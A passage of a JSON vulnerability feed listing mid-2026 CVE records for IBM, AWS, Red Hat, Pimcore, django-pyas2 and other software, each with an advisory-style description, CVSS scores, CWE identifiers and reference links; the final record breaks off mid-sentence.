OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.1:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}]},"references":[{"url":"https://www.ibm.com/support/pages/node/7279997","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-13473","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:14.827","lastModified":"2026-07-17T20:17:14.827","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Storage Protect Client 8.1.0.0 through 8.1.27.0, 8.1.27.1, and 8.2.0.0 through 8.2.1.0 IBM Storage Protect is vulnerable to a heap-based buffer overflow, caused by improper bounds checking. A remote attacker could overflow a buffer and execute arbitrary code on the system or cause the server to crash."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Storage Protect Client","cpes":["cpe:2.3:a:ibm:storage_protect_client:8.1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:storage_protect_client:8.1.27.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:storage_protect_client:8.2.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:storage_protect_client:8.2.1.0:*:*:*:*:*:*:*"],"versions":[{"version":"8.1.0.0","lessThanOrEqual":"8.1.27.0, 8.1.27.1","versionType":"semver","status":"affected"},{"version":"8.2.0.0","lessThanOrEqual":"8.2.1.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}]},"references":[{"url":"https://www.ibm.com/support/pages/node/7279728","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-14499","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:14.950","lastModified":"2026-07-17T20:17:14.950","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.1 Langflow could allow an authenticated user to execute arbitrary commands with elevated privileges on the system due to improper validation of user supplied input in the Python Interpreter component."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.1:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-78"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279996","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-14501","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:15.073","lastModified":"2026-07-17T20:17:15.073","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Db2 Genius Hub 1.1, 1.1.1, 1.1.2 and IBM Agentics 1.0 could allow an attacker to execute arbitrary code or obtain sensitive information due to the use of dangerous functions without sufficient restrictions."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Db2 Genius Hub","cpes":["cpe:2.3:a:ibm:db2_genius_hub:1.1:*:*:*:*:*:*:*","cpe:2.3:a:ibm:db2_genius_hub:1.1.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.1, 1.1.1, 1.1.2","status":"affected"}]},{"vendor":"IBM","product":"Agentics","cpes":["cpe:2.3:a:ibm:agentics:1.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:agentics:1.0.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-676"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279901","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-14971","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:15.190","lastModified":"2026-07-17T20:17:15.190","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM PowerVM Novalink 2.2.02.2.12.2.1.1, and 2.3.02.3.0.12.3.12.3.2 IBM NovaLink APIs misconfiguration may increase attack surface and enable unintended or unauthorized operations under non-default conditions."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"PowerVM Novalink","cpes":["cpe:2.3:a:ibm:powervm_novalink:2.2.02.2.12.2.1.1:*:*:*:*:*:*:*","cpe:2.3:a:ibm:powervm_novalink:2.3.02.3.0.12.3.12.3.2:*:*:*:*:*:*:*"],"versions":[{"version":"2.2.02.2.12.2.1.1","status":"affected"},{"version":"2.3.02.3.0.12.3.12.3.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L","baseScore":3.9,"baseSeverity":"LOW","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.5,"impactScore":3.4}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-16"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7280225","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-14979","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:15.313","lastModified":"2026-07-17T20:17:15.313","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Engineering Lifecycle Management 7.0.3 ( Interim Fix 001 through ) Interim Fix 021, 7.1.0 ( Interim Fix 001 through ) Interim Fix 009, and 7.2.0 and 7.2.0 Interim Fix 001 DOORS could allow a remote attacker to cause a denial of service due to improper handling of XML entity expansion."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Engineering Lifecycle Management","cpes":["cpe:2.3:a:ibm:engineering_lifecycle_management:7.0.3:interim_fix_001:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_lifecycle_management:7.0.3:interim_fix_021:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_lifecycle_management:7.1.0:interim_fix_001:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_lifecycle_management:7.1.0:interim_fix_009:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_lifecycle_management:7.2.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_lifecycle_management:7.2.0:interim_fix_001:*:*:*:*:*:*"],"versions":[{"version":"7.0.3 ( Interim Fix 001","lessThanOrEqual":") Interim Fix 021","versionType":"semver","status":"affected"},{"version":"7.1.0 ( Interim Fix 001","lessThanOrEqual":") Interim Fix 009","versionType":"semver","status":"affected"},{"version":"7.2.0 and 7.2.0 Interim Fix 001","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-776"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279963","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-15069","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:15.450","lastModified":"2026-07-17T20:17:15.450","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Engineering AI Hub 1.0.0, 1.1.0, and 1.2.0 could allow a remote attacker to execute arbitrary script code due to improper neutralization of input during web page generation."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Engineering AI Hub","cpes":["cpe:2.3:a:ibm:engineering_ai_hub:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_ai_hub:1.1.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_ai_hub:1.2.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","status":"affected"},{"version":"1.1.0","status":"affected"},{"version":"1.2.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-78"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279964","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-15091","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:15.567","lastModified":"2026-07-17T20:17:15.567","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Engineering AI Hub 1.0.0, 1.1.0, and 1.2.0 could allow a remote attacker to execute arbitrary scripts due to improper neutralization of input during web page generation."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Engineering AI Hub","cpes":["cpe:2.3:a:ibm:engineering_ai_hub:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_ai_hub:1.1.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_ai_hub:1.2.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","status":"affected"},{"version":"1.1.0","status":"affected"},{"version":"1.2.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N","baseScore":9.3,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.8}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279964","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-15093","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:15.680","lastModified":"2026-07-18T00:16:46.710","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Engineering AI Hub 1.0.0, 1.1.0, and 1.2.0 could allow a remote attacker to redirect users to malicious websites due to improper validation of user-supplied URLs."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Engineering AI Hub","cpes":["cpe:2.3:a:ibm:engineering_ai_hub:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_ai_hub:1.1.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_ai_hub:1.2.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","status":"affected"},{"version":"1.1.0","status":"affected"},{"version":"1.2.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T20:05:15.874835Z","id":"CVE-2026-15093","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Secondary","description":[{"lang":"en","value":"CWE-601"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279964","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-15322","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:15.800","lastModified":"2026-07-17T20:17:15.800","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Engineering AI Hub 1.0.0, 1.1.0, and 1.2.0 could allow a remote attacker to obtain sensitive information due to the exposure of session tokens in URLs."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Engineering AI Hub","cpes":["cpe:2.3:a:ibm:engineering_ai_hub:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_ai_hub:1.1.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:engineering_ai_hub:1.2.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","status":"affected"},{"version":"1.1.0","status":"affected"},{"version":"1.2.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-598"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279964","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-15415","sourceIdentifier":"ff89ba41-3aa1-4d27-914a-91399e9639e5","published":"2026-07-17T20:17:15.923","lastModified":"2026-07-17T20:17:15.923","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"AWS HealthOmics is a HIPAA-eligible service that fully manages the compute, storage, and workflow engine infrastructure required to run bioinformatics analyses at scale for clinical diagnostics, drug discovery, and agricultural research.\n\n\n\nImproper limitation of a pathname to a restricted directory in the linting tools of the AWS HealthOmics MCP Server (aws-healthomics-mcp-server) before version 0.0.36 might allow an actor who can influence the MCP agent to write an actor-controlled content to arbitrary locations outside the intended workflow bundle directory, via directory traversal sequences in the workflow_files input.\n\n\n\n\nTo remediate this issue, users should upgrade to version 0.0.36 or later."}],"affected":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","affectedData":[{"vendor":"AWS","product":"aws-healthomics-mcp-server","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"0.0.36","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","description":[{"lang":"en","value":"CWE-23"}]}],"references":[{"url":"https://aws.amazon.com/security/security-bulletins/2026-060-aws/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"},{"url":"https://github.com/awslabs/mcp/security/advisories/GHSA-6x7f-488g-75wm","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"},{"url":"https://pypi.org/project/awslabs.aws-healthomics-mcp-server/0.0.36/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}},{"cve":{"id":"CVE-2026-15995","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:16.047","lastModified":"2026-07-17T20:17:16.047","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Cognos Analytics 12.1.3 GA Version with build number through 12.1.3-2606251736 could allow an attacker to obtain incorrect report summary results or cause report-processing failures due to a race condition in the Agentic AI assistant's concurrent request-handling logic when multiple authenticated users submit report-related tasks simultaneously."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Cognos Analytics","cpes":["cpe:2.3:a:ibm:cognos_analytics:12.1.3:*:*:*:*:*:*:*","cpe:2.3:a:ibm:cognos_analytics:12.1.3-2606251736:*:*:*:*:*:*:*"],"versions":[{"version":"12.1.3 GA Version with build number","lessThanOrEqual":"12.1.3-2606251736","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-362"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7280311","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-16118","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T20:17:16.167","lastModified":"2026-07-17T20:17:16.167","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in xdgmime. A heap-based buffer overflow can be triggered in _xdg_mime_magic_parse_magic_line() in the xdgmimemagic.c file on little-endian systems when an attacker-controlled MIME magic file in a user-writable XDG data location (e.g., in the $XDG_DATA_HOME/mime/magic path) is parsed by an application performing MIME type detection (e.g., via g_content_type_guess()). When performing byte-swap, incorrect pointer arithmetic on the write side causes an out-of-bounds write of 2 bytes, resulting in an application crash or memory corruption."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Enterprise Linux 10","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"glib2","cpes":["cpe:/o:redhat:enterprise_linux:10"]},{"vendor":"Red Hat","product":"Red Hat Enterprise Linux 7","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"webkitgtk4","cpes":["cpe:/o:redhat:enterprise_linux:7"]},{"vendor":"Red Hat","product":"Red Hat Enterprise Linux 8","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"webkit2gtk3","cpes":["cpe:/o:redhat:enterprise_linux:8"]},{"vendor":"Red Hat","product":"Red Hat Enterprise Linux 9","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"glib2","cpes":["cpe:/o:redhat:enterprise_linux:9"]},{"vendor":"Red Hat","product":"Red Hat Enterprise Linux 9","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"webkit2gtk3","cpes":["cpe:/o:redhat:enterprise_linux:9"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.2}]},"weaknesses":[{"source":"secalert@redhat.com","type":"Primary","description":[{"lang":"en","value":"CWE-122"}]}],"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-16118","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501732","source":"secalert@redhat.com"},{"url":"https://gitlab.freedesktop.org/xdg/xdgmime/-/work_items/41","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-36669","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T20:17:16.293","lastModified":"2026-07-17T20:17:16.293","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"An unauthenticated arbitrary file upload vulnerability in ck_upload_handler.php in Feng Office 3.11.13.11 allows remote attackers to upload malicious files (such as .html) to the web-accessible /tmp/ directory."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://github.com/firstlax6t/CVE-2026-36669-FengOffice","source":"cve@mitre.org"},{"url":"https://www.fengoffice.com/","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-42168","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T20:17:16.410","lastModified":"2026-07-17T20:17:16.410","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"django-pyas2 through 1.2.3 is vulnerable to OS command injection via the cmd_receive and cmd_send fields on the Partner model. These fields are passed directly to os.system() in pyas2/utils.py without sanitization, allowing an authenticated admin user to execute arbitrary commands on the server when an AS2 message is received or sent."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://github.com/abhishek-ram/django-pyas2","source":"cve@mitre.org"},{"url":"https://github.com/abhishek-ram/django-pyas2/releases/tag/v1.2.3","source":"cve@mitre.org"},{"url":"https://github.com/m4ty-m/vulnerability-research/tree/main/CVE-2026-42168","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-43636","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T20:17:16.527","lastModified":"2026-07-17T20:17:16.527","vulnStatus":"Rejected","cveTags":[],"descriptions":[{"lang":"en","value":"Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."}],"metrics":{},"references":[]}},{"cve":{"id":"CVE-2026-44739","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:16.597","lastModified":"2026-07-18T00:16:47.840","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Pimcore is an Open Source Data & Experience Management Platform. Prior to 11.5.17 (LTS) and 12.3.6, the columnConfigAction endpoint in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php passes malicious SQL configuration through CustomReportController:columnConfigAction, SqlAdapter::getColumns, SqlAdapter::buildQueryString, and Db::fetchAssociative(), allowing an attacker with the reports_config permission to use arbitrary SELECT queries, UNION statements, dangerous database functions, and error-based SQL injection to exfiltrate or manipulate database data. This issue is fixed in versions 11.5.17 (LTS) and 12.3.6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"pimcore","product":"pimcore","versions":[{"version":"< 11.5.17","status":"affected"},{"version":">= 12.0.0, < 12.3.6","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":5.8}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T21:31:37.964266Z","id":"CVE-2026-44739","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://github.com/pimcore/pimcore/commit/3fd7733464f464e58ffa49ed91550c1a3f9535f2","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/pull/19098","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/releases/tag/v12.3.6","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/security/advisories/GHSA-3234-gxc3-pq6f","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/security/advisories/GHSA-3234-gxc3-pq6f","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-44974","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:16.727","lastModified":"2026-07-17T20:17:16.727","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"@hapi/content provided HTTP Content-* headers parsing. Prior to 6.0.2, Content.disposition() retained the last occurrence of each duplicate parameter while Content.type() retained the first occurrence of duplicate charset and boundary parameters, creating a parameter-smuggling primitive when another component in the request-processing chain resolves duplicates the opposite way. This can allow an upload filename allowlist bypass in headers such as Content-Disposition: form-data; 